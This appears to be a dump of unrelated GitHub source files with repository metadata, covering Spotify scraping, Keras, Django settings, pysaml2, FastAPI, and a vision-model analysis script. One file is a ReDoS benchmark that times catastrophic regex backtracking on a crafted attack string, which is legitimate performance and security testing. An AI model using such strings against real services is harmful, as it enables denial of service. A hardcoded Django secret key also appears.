self.explicit.clear()
self.name.clear()
self.pop.clear()
self.rel_date.clear()
def artist_toptracks(self, artist_id):
artist = self.spotify.artist_top_tracks(artist_id)
for i in artist['tracks']:
self.artists.append(([x['name'] for x in i['artists']]))
if i['explicit'] == False:
self.explicit.append(0)
else:
self.explicit.append(1)
self.name.append(i['name'])
self.pop.append(i['popularity'])
self.ids.append(i['id'])
self.rel_date.append(self.spotify.track(i['id'])['album']['release_date'])
year = [d[:4] for d in self.rel_date]
audio_features = self.get_audio_features(self.ids)
rest = pd.DataFrame(list(zip(self.explicit, self.artists, self.name, self.rel_date, year, self.pop)))
self.clean_lists()
return self.get_full_data(rest, audio_features)
def album(self, album_id):
album = self.spotify.album_tracks(album_id)
for i in album['items']:
self.artists.append([x['name'] for x in i['artists']])
if (i['explicit']) == False:
self.explicit.append(0)
else:
self.explicit.append(1)
self.name.append(i['name'])
self.pop.append(self.spotify.track(i['id'])['popularity'])
self.rel_date.append(self.spotify.track(i['id'])['album']['release_date'])
self.ids.append(i['id'])
year = [d[:4] for d in self.rel_date]
audio_features = self.get_audio_features(self.ids)
rest = pd.DataFrame(list(zip(self.explicit, self.artists, self.name, self.rel_date, year, self.pop)))
self.clean_lists()
return self.get_full_data(rest, audio_features)
def track(self, track_id):
track = self.spotify.track(track_id)
self.artists.append([i['name'] for i in track['artists']])
if track['explicit'] == False:
self.explicit.append(0)
else:
self.explicit.append(1)
self.name.append(track['name'])
self.pop.append(track['popularity'])
self.ids.append(track['id'])
self.rel_date.append(track['album']['release_date'])
year = [d[:4] for d in self.rel_date]
audio_features = self.get_audio_features(self.ids)
rest = pd.DataFrame(list(zip(self.explicit, self.artists, self.name, self.rel_date, year, self.pop)))
self.clean_lists()
return self.get_full_data(rest, audio_features)
def get_artist_id(self, artist_name):
dummy = []
search = self.spotify.search(q=artist_name, type='artist')
for i in search['artists']['items']:
dummy.append([i['id'], i['name'], i['genres']])
artist_id = pd.DataFrame(dummy)
artist_id.columns = ['id', 'Artist Name', 'Genres']
return artist_id
def get_track_id(self, track_name):
dummy = []
search = self.spotify.search(q=track_name, type='track')
for i in search['tracks']['items']:
dummy.append([i['name'], [j['name'] for j in i['artists']], i['id']])
track_id = pd.DataFrame(dummy)
track_id.columns = ['Song name', 'Artists', 'id']
return track_id
def get_audio_features(self, ids):
val = []
for music_id in ids:
audio = self.spotify.audio_features(music_id)
[audio[0].pop(k) for k in ['type', 'uri', 'track_href', 'analysis_url', 'time_signature']]
val.append([i for i in audio[0].values()])
index = [i for i in audio[0].keys()]
audio_features = pd.DataFrame(val)
audio_features.columns = index
return audio_features
def get_full_data(self, remain, audio_features):
remain.columns = ['explicit', 'artists', 'name', 'release_date', 'year', 'popularity']
data = pd.concat([audio_features, remain], axis=1)
cols = ['acousticness', 'artists', 'danceability', 'duration_ms', 'energy', 'explicit', 'id', 'instrumentalness', 'key', 'liveness', 'loudness', 'mode', 'name', 'popularity', 'release_date', 'speechiness', 'tempo', 'valence', 'year']
data = data[cols]
return data
def playlist(self, playlist_id):
pl=self.spotify.playlist_tracks(playlist_id=playlist_id)
for i in pl['items']:
self.artists.append([x['name'] for x in i['track']['artists']])
if i['track']['explicit'] == False:
self.explicit.append(0)
else:
self.explicit.append(1)
self.name.append(i['track']['name'])
self.pop.append(i['track']['popularity'])
self.rel_date.append(i['track']['album']['release_date'])
self.ids.append(i['track']['id'])
year = [d[:4] for d in self.rel_date]
audio_features = self.get_audio_features(self.ids)
rest = pd.DataFrame(list(zip(self.explicit, self.artists, self.name, self.rel_date, year, self.pop)))
self.clean_lists()
return self.get_full_data(rest, audio_features)
def related_artists(self, artist_name):
related_artists = []
artist_id = self.get_artist_id(artist_name).iloc[0,0]
search = self.spotify.artist_related_artists(artist_id)
for i in search['artists']:
related_artists.append([i['name'], i['id']])
return pd.DataFrame(related_artists)
| [
"noreply@github.com"
] | Hadryan.noreply@github.com |
07aebc8436388522c9187ba82736dcfd7ad184a5 | a142b049668648f5a3ffb4714a9d472ff9f5e5e8 | /keras1/keras51_Tokenizer.py | f3f733838bea78c799af6bc85922b82620ebdf72 | [] | no_license | yunnyisgood/Tensorflow | 237944a3251b608bd688f1096618e55317265037 | 6af04eca3c51815509e53d65d03e471177b9e02f | refs/heads/main | 2023-08-09T14:35:28.939447 | 2021-09-13T14:02:20 | 2021-09-13T14:02:20 | 384,322,092 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 830 | py | from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.utils import to_categorical
text = '나는 진짜 매우 맛있는 밥을 진짜 마구 마구 먹었다.'
token = Tokenizer()
token.fit_on_texts([text])
print(token.word_index)
# {'진짜': 1, '마구': 2, '나는': 3, '매우': 4, '맛있는': 5, '밥을': 6, '먹었다': 7}
x = token.texts_to_sequences([text])
print(x)
# [[3, 1, 4, 5, 6, 1, 2, 2, 7]]
word_size = len(token.word_index)
print(word_size) # 7
print(type(x))
x = to_categorical(x)
print(x)
print(x.shape)
'''
[[[0. 0. 0. 1. 0. 0. 0. 0.]
[0. 1. 0. 0. 0. 0. 0. 0.]
[0. 0. 0. 0. 1. 0. 0. 0.]
[0. 0. 0. 0. 0. 1. 0. 0.]
[0. 0. 0. 0. 0. 0. 1. 0.]
[0. 1. 0. 0. 0. 0. 0. 0.]
[0. 0. 1. 0. 0. 0. 0. 0.]
[0. 0. 1. 0. 0. 0. 0. 0.]
[0. 0. 0. 0. 0. 0. 0. 1.]]]
(1, 9, 8)
''' | [
"cyeon0801@gmail.com"
] | cyeon0801@gmail.com |
4149763b5973c1df83a28fbbfac81d7ff11885af | 7fdf4c04baed5f429110045d555e384dc71e08f1 | /python/modules.py | 3e63a5694605d15b25b2648b1729092cf52fa80b | [] | no_license | andrsj/Python-Edu | 8f3d336fc35c325ca546fb508d49f7ee892b5b7d | a2f09876b977f071ff11576ad987af477b0889c6 | refs/heads/master | 2021-03-18T22:20:27.854983 | 2020-04-23T18:05:04 | 2020-04-23T18:05:04 | 247,105,092 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,574 | py | # MODULES
m.__dict__ # Атрибути модуля
m.__doc__ # Doc
m.__name__ # Name
m.__file__ # File
m.__path__ # Path
# module: spam.py
__all__ = [ ‘bar’, ‘Spam’ ]
# Ці імена будуть імпортовані при команді from spam import *
# Перевірити, чи модуль був запущений як програма
if __name__ == "__main__":
pass
else:
# Файл, був імпортований як модуль
pass
# Copy
copy()
deepcopy()
# sys
sys.float_info
sys.maxsize
sys.path
sys:
stdout | stdin | stderr
# Decimal
import decimal
x = decimal.Decimal("3.4")
y = decimal.Decimal("4.5")
a = x * y # a = decimal.Decimal(‘15.30’)
b = x / y # b = decimal.Decimal(‘0.7555555555555555555555555556’)
decimal.getcontext().prec = 3
c = x * y # c = decimal.Decimal(‘15.3’)
d = x / y # d = decimal.Decimal(‘0.756’)
a = decimal.Decimal(42) # Створить Decimal("42")
b = decimal.Decimal("37.45") # Створить Decimal("37.45")
c = decimal.Decimal((1,(2,3,4,5),-2)) # Створить Decimal("-23.45")
d = decimal.Decimal("Infinity")
e = decimal.Decimal("NaN")
x.exp()
x.ln()
x.log10()
x.sqrt()
# Fractions
>>> f = fractions.Fraction(3,4)
>>> f
Fraction(3, 4)
>>> g = fractions.Fraction(“1.75”)
>>> g
Fraction(7, 4)
>>> h = fractions.Fraction.from_float(3.1415926)
Fraction(3537118815677477, 1125899906842624)
>>>
# Datetime
import datetime
x = datetime.datetime.now()
print(x)
print(x.strftime("%_"))
VVVVVVVVVVVVVVVVVVVVVVVV
%a Weekday, short version Wed
%A Weekday, full version Wednesday
%w Weekday as a number 0-6, 0 is Sunday 3
%d Day of month 01-31 31
%b Month name, short version Dec
%B Month name, full version December
%m Month as a number 01-12 12
%y Year, short version, without century 18
%Y Year, full version 2018
%H Hour 00-23 17
%I Hour 00-12 05
%p AM/PM PM
%M Minute 00-59 41
%S Second 00-59 08
%f Microsecond 000000-999999 548513
%z UTC offset +0100
%Z Timezone CST
%j Day number of year 001-366 365
%U Week number of year, Sunday as the first day of week, 00-53 52
%W Week number of year, Monday as the first day of week, 00-53 52
%c Local version of date and time Mon Dec 31 17:41:00 2018
%x Local version of date 12/31/18
%X Local version of time 17:41:00
%% A % character % | [
"61803449+andrsj@users.noreply.github.com"
] | 61803449+andrsj@users.noreply.github.com |
052f814055a4ea1b0c87f9a67983858539c629f3 | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/matrix/03621ea5957641a2ad11d0d2303103e5.py | 5c1164e155a96298fac1d2fac55d3c2c202a80e4 | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 1,857 | py | class Matrix:
def __init__(self, data):
"""Create a matrix object and fill it with the provided data.
The data must be the matrix in ASCII format, with embedded newlines,
e.g. '1 2 3\n4 5 6'.
"""
self.height = 0
self.width = 0
self._data = []
for row in data.split("\n"):
self.height += 1
row_values = [int(v) for v in row.strip().split()]
if not self.width:
self.width = len(row_values)
elif self.width != len(row_values):
raise ValueError(
"Row %d has an unexpected number of values" % self.height)
self._data.extend(row_values)
@property
def rows(self):
"""A list of matrix rows."""
return [
self._data[row*self.width : (row+1)*self.width]
for row in xrange(0, self.height)
]
@property
def columns(self):
"""A list of matrix columns."""
return [
self._data[column :: self.width]
for column in xrange(0, self.width)
]
def _data_index(self, column, row):
if row < 0 or row > self.height:
raise IndexError("Row %d does not exist" % row)
if column < 0 or column > self.width:
raise IndexError("Column %d does not exist" % column)
return column + row * self.width
def get(self, column, row):
"""Returns the value from the matrix at coordinate (column, row)."""
return self._data[self._data_index(column, row)]
def set(self, column, row, value):
"""Set the value for the matrix at coordinate (column, row)."""
self._data[self._data_index(column, row)] = value
def sum(self):
"""Returns the sum of all values in the matrix."""
return sum(self._data)
| [
"rrc@berkeley.edu"
] | rrc@berkeley.edu |
77c0e37ed35697f5c5bdcd4b5739f3cce73b4472 | ffd0603413ec537e14f977196b564f4523e29545 | /mysite/mysite/settings.py | 0fa56d38541987273f522ac81761da22f61ab163 | [] | no_license | sorwarduet/blog_project_new | 3b58d407c22bf3f4fbfe796356cc073082f80c9a | 98c37fb474860971dc28a5a1730826d31c9d6f6c | refs/heads/master | 2021-08-23T11:53:14.324873 | 2017-12-04T20:07:05 | 2017-12-04T20:07:05 | 113,047,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,331 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.11.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
TEMPLATE_DIR=os.path.join(BASE_DIR,'blog/templates/blog')
STATIC_DIR=os.path.join(BASE_DIR,'blog/static')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'g50b-v83-g_4yd8$lmtqx4%!xeg-s4)8z(i0694ku0*dxtaj3^'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATE_DIR,],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT=os.path.join(BASE_DIR,'static')
LOGIN_REDIRECT_URL='/'
STATICFILES_DIRS=[
STATIC_DIR,
] | [
"esorwar.cse@gmail.com"
] | esorwar.cse@gmail.com |
50a976545023e2867694a4b0470c533b5ec610fb | a1794eabcc58e65cf49087c846a8cf1e7ee83941 | /desktop/core/ext-py/pysaml2-2.4.0/src/saml2/eptid.py | b2551b44f6ce3ae5220ca03de959043a020dbc10 | [
"Apache-2.0"
] | permissive | BelieveDjango/hue | 22502a5f250d5df4c3adc1afa2e3b659e8888089 | d6cbec42d8bcb1e9c0f729b5a22a38abb2c6dee4 | refs/heads/master | 2023-08-31T01:20:23.906783 | 2016-05-19T23:51:28 | 2016-05-19T23:51:28 | 59,281,298 | 0 | 0 | Apache-2.0 | 2023-08-11T05:06:18 | 2016-05-20T09:16:05 | Python | UTF-8 | Python | false | false | 1,368 | py | # An eduPersonTargetedID comprises
# the entity name of the identity provider, the entity name of the service
# provider, and a opaque string value.
# These strings are separated by "!" symbols. This form is advocated by
# Internet2 and may overtake the other form in due course.
import hashlib
import shelve
import logging
logger = logging.getLogger(__name__)
class Eptid(object):
def __init__(self, secret):
self._db = {}
self.secret = secret
def make(self, idp, sp, args):
md5 = hashlib.md5()
for arg in args:
md5.update(arg.encode("utf-8"))
md5.update(sp)
md5.update(self.secret)
md5.digest()
hashval = md5.hexdigest()
return "!".join([idp, sp, hashval])
def __getitem__(self, key):
return self._db[key]
def __setitem__(self, key, value):
self._db[key] = value
def get(self, idp, sp, *args):
# key is a combination of sp_entity_id and object id
key = ("__".join([sp, args[0]])).encode("utf-8")
try:
return self[key]
except KeyError:
val = self.make(idp, sp, args)
self[key] = val
return val
class EptidShelve(Eptid):
def __init__(self, secret, filename):
Eptid.__init__(self, secret)
self._db = shelve.open(filename, writeback=True)
| [
"erickt@cloudera.com"
] | erickt@cloudera.com |
0ac1d93bb67a120a72ecf7874363b5562af9dee2 | cdd499a39bc4c5152ade3b106abf0eddfea2a133 | /analysis.py | 691bec189d8b79e88a843ea347462c50ddaefefc | [] | no_license | joel99/illusions | 307f7f7b94061ad67ca90702529e64cc49fc21e5 | 3f4adeebc38e94ef15a1b6f169754a3274319c3a | refs/heads/main | 2023-04-29T21:16:23.418173 | 2021-05-05T00:00:36 | 2021-05-05T00:00:36 | 352,145,024 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,524 | py | #%%
from pathlib import Path
import os.path as osp
from yacs.config import CfgNode as CN
import matplotlib.pyplot as plt
from PIL import Image
import torch
import torch.nn.functional as F
from config.default import get_config
from model import SaccadingRNN
from dataset import UniformityDataset
seed = 0
config = './config/base.yaml'
config = './config/debug.yaml'
# config = './config/debug2.yaml'
# config = './config/base.yaml'
# config = './config/base_e2e.yaml'
config = './config/large.yaml'
config = './config/large_adv.yaml'
version = 5
version = 0
version = 2
config = './config/large_adv_sin.yaml'
version = 4
config = './config/large_sin.yaml'
# version = 18
version = 19
# config = './config/snakes_slow.yaml'
# version = 0
# version = 2
# version = 3
config = './config/snakes.yaml'
version = 9
config = './config/snakes_large.yaml'
version = 0
config = './config/snakes_cifar.yaml'
version = 6
# TODO add state_dict
config = './config/snakes_ssim.yaml'
version = 3
config = './config/pdi.yaml'
version = 0
# version = 3
config = './config/pdi_polar.yaml'
version = 7
config = './config/circ.yaml'
version = 0
config = './config/troxler_batch_clean.yaml'
config = './config/troxler_batch.yaml'
version = 0
# config = './config/pdi_fourier.yaml'
# config ='./config/pdi_fourier_noise.yaml'
# config = './config/pdi_fourier_random.yaml'
config = './config/pdi_fourier_noise_random.yaml'
version = 0 # Overfit
# version = 2 # Generalization
variant = osp.split(config)[1].split('.')[0]
config = get_config(config)
root = Path(f'runs/{variant}-{seed}/lightning_logs/')
# * This is the default output, if you want to play around with a different checkpoint load it here.
model_ckpt = list(root.joinpath(f"version_{version}").joinpath('checkpoints').glob("*"))[0]
weights = torch.load(model_ckpt, map_location='cpu')
model = SaccadingRNN(config)
model.load_state_dict(weights['state_dict'])
model.eval()
if config.TASK.NAME == 'UNIFORMITY':
dataset = UniformityDataset(config, split="train")
else:
dataset = UniformistyDataset(config, split="train", dataset_root=f'./data/{config.TASK.NAME}', augment=['rotate'])
# dataset = UniformityDataset(config, split="test", dataset_root=f'./data/{config.TASK.NAME}')
index = 0
# index = 2
# index = 9
# index = 25000
# index = 700
# index = 750
# index = 800
image = dataset[index]
proc_view = UniformityDataset.unpreprocess(image).permute(1, 2, 0)
proc_view = proc_view.squeeze(-1)
plt.imshow(proc_view)
sac_length = 50
saccades = model._generate_saccades(image, length=sac_length)[:, :1]
all_views, noised_views, patches, state = model.predict_with_saccades(image, saccades, mode='predictive_patch')
# Note, simply using saccades twice in a row is OOD.
# all_views, noised_views, patches, state = model.predict(image)
# Hm, doesn't seem to matter.... am I looking at the right output?
# Why is my loss higher than reported?
print(all_views.size(), patches.size())
loss1 = F.mse_loss(all_views[1], patches[0])
loss1 = F.mse_loss(all_views[1:], patches)
print(loss1)
print(saccades.float().mean())
plt.imshow(image.squeeze(0))
plt.axis('off')
# Wow, there's barely any loss... what gives?
# losses = [F.mse_loss(all_views[i+1], patches[i]) for i in range(49)]
# plt.plot(losses)
#%%
# It don't even look like the right image.
times = [0, 10, 20, 30]
f, axes = plt.subplots(len(times), 2, sharex=True, sharey=True)
for i, t in enumerate(times):
true_image = all_views[t + all_views.size(0) - patches.size(0), 0]
# true_image = noised_views[t + all_views.size(0) - patches.size(0), 0]
proc_true = UniformityDataset.unpreprocess(true_image).permute(1, 2, 0)
proc_true = proc_true.squeeze(-1)
# axes[i, 0].imshow(proc_true[..., 2])
axes[i, 0].imshow(proc_true)
pred_image = patches[t, 0]
print(F.mse_loss(true_image, pred_image)) # how can my average in the previous timestep be lower than all my samples here?
proc_pred = UniformityDataset.unpreprocess(pred_image).permute(1, 2, 0)
proc_pred = proc_pred.squeeze(-1)
# axes[i, 1].imshow(proc_pred[..., 2])
axes[i, 1].imshow(proc_pred)
axes[0, 0].set_title('True')
axes[0, 1].set_title('Pred')
plt.savefig('test.png')
#%%
import numpy as np
step = 3
grid_h = np.linspace(0, image.size(-2)-1, step)
grid_w = np.linspace(0, image.size(-1)-1, step)
grid_x, grid_y = np.meshgrid(grid_h, grid_w)
grid = torch.stack([torch.tensor(grid_x), torch.tensor(grid_y)], dim=-1).long()
grid = grid.flatten(0, 1)
step_state = state.expand(grid.size(0), -1, -1)
patches = model._predict_at_location(step_state, grid.unsqueeze(1), mode='patch').detach()
print(patches.size())
# Assemble patches
w_span, h_span = model.cfg.FOV_WIDTH // 2, model.cfg.FOV_HEIGHT // 2
padded_image = F.pad(image.squeeze(0), (w_span, w_span, h_span, h_span))
belief = torch.zeros_like(padded_image).detach()
# Pad image
for patch, loc in zip(patches, grid):
belief[
loc[0]: loc[0] + 2 * w_span,
loc[1]: loc[1] + 2 * h_span
] = patch
f, axes = plt.subplots(1, 2, sharex=True, sharey=True)
print(saccades.size()) # ! I think there's a transpose happening
axes[0].scatter(*(saccades.T + w_span), color='white')
# Flip direction since saccade higher = matrix lower
axes[0].imshow(padded_image, origin='lower')
axes[0].set_title('True')
axes[0].axis('off')
axes[1].imshow(belief, origin='lower')
axes[1].set_title('Perceived')
axes[1].axis('off')
plt.savefig('test.png', dpi=300)
# %%
#%%
plt.imshow(image.squeeze(0))
plt.savefig('test.png', dpi=300)
#%%
all_views, noised_views, patches, state = model.predict_with_saccades(image, saccades, mode='predictive_patch')
fixate_saccades = model._generate_saccades(image, mode='fixate')
all_views, noised_views, patches, fixate_state = model.predict_with_saccades(image, fixate_saccades, mode='predictive_patch', initial_state=None)
# all_views, noised_views, patches, fixate_state = model.predict_with_saccades(image, fixate_saccades, mode='predictive_patch', initial_state=state)
step = 3
grid_h = np.linspace(0, image.size(-2), step)
grid_w = np.linspace(0, image.size(-1), step)
grid_x, grid_y = np.meshgrid(grid_h, grid_w)
grid = torch.stack([torch.tensor(grid_x), torch.tensor(grid_y)], dim=-1).long()
grid = grid.flatten(0, 1)
step_state = state.expand(grid.size(0), -1, -1)
step_fixate = fixate_state.expand(grid.size(0), -1, -1)
patches = model._predict_at_location(step_state, grid, mode='patch').detach()
fixate_patches = model._predict_at_location(step_fixate, grid, mode='patch').detach()
# Assemble patches
w_span, h_span = model.cfg.FOV_WIDTH // 2, model.cfg.FOV_HEIGHT // 2
padded_image = F.pad(image.squeeze(0), (w_span, w_span, h_span, h_span))
belief = torch.zeros_like(padded_image).detach()
fixate_belief = torch.zeros_like(padded_image).detach()
# Pad image
for patch, fixate_patch, loc in zip(patches, fixate_patches, grid):
belief[
loc[0]: loc[0] + 2 * w_span,
loc[1]: loc[1] + 2 * h_span
] = patch
fixate_belief[
loc[0]: loc[0] + 2 * w_span,
loc[1]: loc[1] + 2 * h_span
] = fixate_patch
f, axes = plt.subplots(1, 3, sharex=True, sharey=True)
axes[1].scatter(*(saccades.T + w_span), color='white')
axes[0].imshow(padded_image)
axes[0].set_title('True')
axes[0].axis('off')
axes[1].imshow(belief)
axes[1].set_title('Perceived')
axes[1].axis('off')
axes[2].imshow(fixate_belief)
axes[2].set_title('Fixation (w/o saccade)')
axes[2].axis('off')
axes[2].scatter(*(fixate_saccades.T + w_span), color='white')
plt.savefig('test.png', dpi=300)
| [
"joelye9@gmail.com"
] | joelye9@gmail.com |
6021df1a5e4afffdf7611d6391b4abe981929627 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2845/60765/274571.py | e890da8bf65c177ac99bcb7981532e0c0a99bf23 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 437 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
n=input()
# n,t=list(map(int,input().split()))
#serial=input().split()
a=list(map(int,input().split()))
b=list(map(int,input().split()))
n=len(b)
c=[[a[i],b[i]] for i in range(n)]
c.sort(key=lambda x:x[0])
# print(c)
result=[c[i][1]-c[i+1][1] for i in range(n-1)]
for i in range(n-1):
if result[i]>0:
print('Happy Alex')
break
elif i==n-2:
print('Poor Alex')
| [
"1069583789@qq.com"
] | 1069583789@qq.com |
c6406ced2221fb7e2c50769c42574bc91280dd5a | 0adb68bbf576340c8ba1d9d3c07320ab3bfdb95e | /regexlib/2021-5-15/python_re_test_file/regexlib_7745.py | ffca8351109d1a4bdc6278e4c8266b6f3ecf2f39 | [
"MIT"
] | permissive | agentjacker/ReDoS-Benchmarks | c7d6633a3b77d9e29e0ee2db98d5dfb60cde91c6 | f5b5094d835649e957bf3fec6b8bd4f6efdb35fc | refs/heads/main | 2023-05-10T13:57:48.491045 | 2021-05-21T11:19:39 | 2021-05-21T11:19:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 475 | py | # 7745
# ^\w*[-]*\w*\\\w*$
# POLYNOMIAL
# nums:4
# POLYNOMIAL AttackString:""+"0"*10000+"! _1_POA(i)"
import re
from time import perf_counter
regex = """^\w*[-]*\w*\\\w*$"""
REGEX = re.compile(regex)
for i in range(0, 150000):
ATTACK = "" + "0" * i * 10000 + "! _1_POA(i)"
LEN = len(ATTACK)
BEGIN = perf_counter()
m = REGEX.search(ATTACK)
# m = REGEX.match(ATTACK)
DURATION = perf_counter() - BEGIN
print(f"{i *10000}: took {DURATION} seconds!") | [
"liyt@ios.ac.cn"
] | liyt@ios.ac.cn |
9cd31045bab54a275a87b2929087052987ccfdcd | 04b1803adb6653ecb7cb827c4f4aa616afacf629 | /third_party/blink/web_tests/external/wpt/xhr/resources/inspect-headers.py | e71f671ced34ff3d447467ea4098e6e000ffd8f7 | [
"LGPL-2.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"GPL-1.0-or-later",
"GPL-2.0-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft",
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | permissive | Samsung/Castanets | 240d9338e097b75b3f669604315b06f7cf129d64 | 4896f732fc747dfdcfcbac3d442f2d2d42df264a | refs/heads/castanets_76_dev | 2023-08-31T09:01:04.744346 | 2021-07-30T04:56:25 | 2021-08-11T05:45:21 | 125,484,161 | 58 | 49 | BSD-3-Clause | 2022-10-16T19:31:26 | 2018-03-16T08:07:37 | null | UTF-8 | Python | false | false | 1,356 | py | def get_response(raw_headers, filter_value, filter_name):
result = ""
for line in raw_headers.headers:
if line[-2:] != '\r\n':
return "Syntax error: missing CRLF: " + line
line = line[:-2]
if ': ' not in line:
return "Syntax error: no colon and space found: " + line
name, value = line.split(': ', 1)
if filter_value:
if value == filter_value:
result += name + ","
elif name.lower() == filter_name:
result += name + ": " + value + "\n"
return result
def main(request, response):
headers = []
if "cors" in request.GET:
headers.append(("Access-Control-Allow-Origin", "*"))
headers.append(("Access-Control-Allow-Credentials", "true"))
headers.append(("Access-Control-Allow-Methods", "GET, POST, PUT, FOO"))
headers.append(("Access-Control-Allow-Headers", "x-test, x-foo"))
headers.append(("Access-Control-Expose-Headers", "x-request-method, x-request-content-type, x-request-query, x-request-content-length"))
headers.append(("content-type", "text/plain"))
filter_value = request.GET.first("filter_value", "")
filter_name = request.GET.first("filter_name", "").lower()
result = get_response(request.raw_headers, filter_value, filter_name)
return headers, result
| [
"sunny.nam@samsung.com"
] | sunny.nam@samsung.com |
69e8b76324acdc71454c9bed7115bb9276cc104c | 09f205f74070c53e694d52f0bc72e203a2fd224f | /docs_src/query_params/tutorial006.py | d764c2a863e0809462be935bbc57ab24d2df9b29 | [
"MIT"
] | permissive | RunningIkkyu/fastapi | 53c02fed44b9e30e8617c94ec902be7ca579e42b | 05736c40d3fbb008fd9cdbe1adb8fcef7676e0c6 | refs/heads/master | 2021-05-18T07:58:33.640797 | 2020-05-21T01:36:47 | 2020-05-21T01:36:47 | 251,189,158 | 2 | 0 | MIT | 2020-05-21T01:36:49 | 2020-03-30T03:13:43 | Python | UTF-8 | Python | false | false | 256 | py | from fastapi import FastAPI
app = FastAPI()
@app.get("/items/{item_id}")
async def read_user_item(item_id: str, needy: str, skip: int = 0, limit: int = None):
item = {"item_id": item_id, "needy": needy, "skip": skip, "limit": limit}
return item
| [
"tiangolo@gmail.com"
] | tiangolo@gmail.com |
9f5f60cd24bb4ba0a3ed8fc4a7b797829f8a4512 | 181af10fcf40b824fe92d3b8f72fd15d6d1490c2 | /Biweekly Contests/51-100/biweek 98/2568. Minimum Impossible OR/Minimum Impossible OR.py | 6bbcc085906cb358f19e80cbfef2653c5595026a | [] | no_license | wangyendt/LeetCode | 402c59a0b7b7f5b3a672231ea5dad8056ade36af | 4a3ba15284c45b2d8bf38306c8c8526ae174615c | refs/heads/master | 2023-08-10T06:27:54.995152 | 2023-08-10T02:22:27 | 2023-08-10T02:22:27 | 176,651,399 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 518 | py | """
@author: wangye(Wayne)
@license: Apache Licence
@file: Minimum Impossible OR.py
@time: 20230330
@contact: wang121ye@hotmail.com
@site: wangyendt@github.com
@software: PyCharm
# code is far away from bugs.
"""
from typing import *
class Solution:
def minImpossibleOR(self, nums: List[int]) -> int:
nums_set = set(nums)
for i in range(1000):
if (1 << i) not in nums_set:
return 1 << i
so = Solution()
print(so.minImpossibleOR(nums=[4, 32, 16, 8, 8, 75, 1, 2]))
| [
"905317742@qq.com"
] | 905317742@qq.com |
160bdd13a34885811fabe3e183291048859c9306 | 4296cb5b97a69382d1fe6b73753a2ffcd1d154c5 | /tenkei90/064.py | 05309a40d520930ec7dd6c78e4e01ef920de1155 | [] | no_license | tokuD/atcoder | a199a5fe92be54d0b66ceaf6158116984f52cd01 | a95a0380af129109fcf48eb1d4994bbb52925320 | refs/heads/master | 2023-08-28T10:28:55.763895 | 2021-11-13T15:49:38 | 2021-11-13T15:49:38 | 371,675,666 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 635 | py | def main():
N,Q = map(int,input().split())
